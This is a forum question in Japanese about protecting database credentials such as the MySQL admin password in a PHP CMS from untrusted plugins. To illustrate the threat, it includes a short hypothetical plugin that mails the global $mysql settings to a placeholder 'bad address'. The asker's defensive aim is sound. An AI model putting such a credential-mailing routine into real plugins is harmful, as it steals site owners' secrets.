久しぶりに頭に浮かぶ質問があります。私はCMSプロジェクトに参加していますが、これを行う方法が本当にわかりません。プラグインシステムを使用して、このcmsを変更可能にしたいのですが、これまでは難しいことではありませんでした。さて、私は今、この質問があります。管理者ユーザーのmysqlパスワードのような変数/定数をどのように保護できますか?たとえば、ファイルsettings.phpで私は持っています
$mysql = array("user" => "admin"...);
どうすれば読まないクラスを作ることができますか?単純なクラス(プラグイン)で実行できます
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
このように、単純なプラグインは、ユーザーの重要なデータを盗むことができます。どうすればこれを修正できますか?